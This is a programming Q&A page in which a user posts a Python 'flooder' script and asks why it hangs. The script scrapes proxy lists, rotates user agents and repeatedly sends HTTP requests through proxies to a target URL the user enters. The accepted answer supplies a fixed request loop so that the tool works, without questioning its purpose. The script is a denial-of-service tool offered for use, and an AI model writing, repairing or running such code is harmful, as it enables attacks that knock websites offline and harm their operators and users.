# Problems building a flooding script that uses sockets

Tags: sockets, python-3.x, proxy, proxies

I'm trying to improve 2 projects of flooders (not mine) making my own script that these 2 ones. Doing that, I've almost finished but I'm stuck in a point where the script does nothing.
Here is the code:

```
import socket, threading, random, time, urllib.request, re, os.path
from bs4 import BeautifulSoup

useragents=["Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A",
            "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
            "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko",
            "Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0",
            "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1",
            "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
            "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
            "Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246",
            "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1",]

def checkurl():
    global url
    url = input("Insert URL: ")
    if url[0]+url[1]+url[2]+url[3] == "www.":
        url = "http://" + url
    elif url[0]+url[1]+url[2]+url[3] == "http":
        pass
    else:
        url = "http://" + url

def threads():
    global thread
    try:
        thread = int(input("Thread (800): "))
    except:
        thread = 800

def proxymode():
    global choise1
    choise1 = input("Do you want proxy mode? Answer 'y' to enable it: ")
    if choise1 == "y":
        choisedownproxy()
    else:
        exit(0)

def choisedownproxy():
    choise2 = input("Do you want to download a fresh list of proxy? Answer 'y' to do it: ")
    print ("")
    if choise2 == "y":
        proxyget()
    else:
        proxylist()

def proxyget():
    if os.path.isfile("proxy.txt"):
        out_file = open("proxy.txt","w")
        out_file.write("")
        out_file.close()
    else:
        pass
    url = "https://www.inforge.net/xi/forums/liste-proxy.1118/"
    soup = BeautifulSoup(urllib.request.urlopen(url), "lxml")
    base = "https://www.inforge.net/xi/"
    for tag in soup.find_all("a", {"class":"PreviewTooltip"}):
        links = tag.get("href")
        final = base + links
        result = urllib.request.urlopen(final)
        for line in result :
            ip = re.findall("(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})", str(line))
            if ip:
                print("Proxy grabbed=> "+'\n'.join(ip))
                for x in ip:
                    out_file = open("proxy.txt","a")
                    while True:
                        out_file.write(x+"\n")
                        out_file.close()
                        break
    proxylist()

def proxylist():
    global proxy
    global entries
    out_file = str(input("Enter the proxy list: "))
    entries = open(out_file).readlines()
    proxy = random.choice(entries).strip().split(':')
    requestproxy()

def requestproxy():
    global proxy
    host = proxy[0]
    port = proxy[1]
    host_url = url.replace("http://", "").replace("https://", "").split('/')[0]
    get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n"
    useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
    accept = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate"
    connection = "Connection: Keep-Alive\r\n"
    request = get_host + useragent + accept + connection + "\r\n"
    while True:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host, port))
            s.send(request)
        except:
            proxy = random.choice(entries).strip().split(':')

checkurl()
threads()
proxymode()
```

As you can see, this script uses a list of proxies to send request (using socket library) to target. But when I arrive at "Enter the proxy list" and after typed "proxy.txt", the script gets stuck! What did I do wrong? Can you help me?

Answer (score 1, accepted):

After you entered "proxy.txt" the script opens the file and then calls requestproxy(). At the end of your requestproxy() you have a "while True". This is an infinite loop, so it will get stuck there unless there is a "break" somewhere, which isn't the case. You should probably add a break after s.send(request) and put the entire function into a loop. That way your infinite loop stops if the package has been sent, but if there was an exception it will try again with a different proxy.

That would look like this:

```
def requestproxy():
    while True:
        global proxy
        host = proxy[0]
        port = proxy[1]
        host_url = url.replace("http://", "").replace("https://", "").split('/')[0]
        get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n"
        useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
        accept = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate"
        connection = "Connection: Keep-Alive\r\n"
        request = get_host + useragent + accept + connection + "\r\n"
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host, port))
            s.send(request)
            break
        except:
            proxy = random.choice(entries).strip().split(':')
```

I hope this helps. Have a nice day!